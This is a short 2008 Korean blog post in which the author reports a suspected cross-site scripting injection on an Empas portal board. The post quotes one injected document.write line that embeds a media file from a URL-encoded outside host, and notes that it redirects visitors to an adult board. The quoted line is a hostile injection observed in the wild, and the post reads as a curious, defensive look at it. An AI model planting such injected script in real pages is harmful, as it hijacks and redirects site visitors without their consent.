xss in 엠파스 게시판
2008. 6. 22. 21:57
http://newscomm.empas.com/board/bbs/read.html?a=180886&b=star&p=0
엠파스 게시판에서 이따금씩 처자사진들을 클릭해서 보는데 종종 성인 게시판이 링크가 되있길래
위의 링크에서 소스를 봤더니
document.write("<EMBED src=http://my.%44%72%45%41%4dw%49z.com/mkmkloklop/bbbb.wmv width=6 height=6>");
의심가는 내용은 저 한줄입니다.. paros로 봤더니 잠시뒤에 특정 페이지로 요청을 보낸 후 성인 게시판으로 이동이 되네요. response 메세지를 보고 싶었는데 웹프락시나 패킷 캡쳐를 해봐도 좀처럼 나오질 않네요. wmv 파일로 어떻게 xss를 하는지 궁금하군요
'Sabzil' 카테고리의 다른 글
| ABI (Application Binary Interface) (0) | 2009.03.17 |
|---|---|
| Nefif_rx (0) | 2009.03.17 |
| usleep에 대해서 (0) | 2009.01.08 |
| strtok_r (0) | 2008.09.29 |
| this is RAM (0) | 2008.08.21 |
| nit_if.h (0) | 2008.07.17 |
| about ftp (0) | 2008.07.15 |
| amd64 and x86 endian order (0) | 2008.06.23 |
| glibc-2.5/elf/dl-runtime.c 코드 분석을 통한 lazy binding 재배치 방식 분석 (0) | 2008.06.23 |
| sk_buff 구조체 (0) | 2008.06.17 |